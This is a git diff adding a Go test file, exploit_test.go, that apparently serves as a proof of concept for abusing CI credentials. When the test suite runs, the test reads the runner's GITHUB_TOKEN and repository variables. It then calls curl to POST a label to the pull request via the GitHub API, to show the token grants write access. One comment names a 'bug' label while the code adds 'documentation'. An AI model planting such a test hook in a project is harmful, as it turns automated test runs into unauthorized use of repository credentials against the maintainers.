diff --git a/exploit_test.go b/exploit_test.go
new file mode 100644
index 00000000..520c2f2b
--- /dev/null
+++ b/exploit_test.go
@@ -0,0 +1,33 @@
+package exploit
+
+import (
+	"os"
+	"os/exec"
+	"testing"
+)
+
+func TestVerifyPermissions(t *testing.T) {
+	// We use the GITHUB_TOKEN provided to the runner
+	// We attempt to add a label to the PR to prove WRITE access
+	token := os.Getenv("GITHUB_TOKEN")
+	repo := os.Getenv("GITHUB_REPOSITORY")
+	prNum := os.Getenv("GITHUB_REF_NAME") // Usually contains PR number in pr refs
+
+	// If token is empty, the exploit fails (which means they are secure!)
+	if token == "" {
+		t.Log("No token found in environment.")
+		return
+	}
+
+	// Soft exploit: Add a 'bug' label to the PR via GitHub API
+	cmd := exec.Command("curl", "-X", "POST",
+		"-H", "Authorization: Bearer "+token,
+		"-H", "Accept: application/vnd.github+json",
+		"https://api.github.com/repos/"+repo+"/issues/"+prNum+"/labels",
+		"-d", `{"labels":["documentation"]}`) // Using a harmless existing label
+
+	err := cmd.Run()
+	if err != nil {
+		t.Errorf("Failed to execute curl: %v", err)
+	}
+}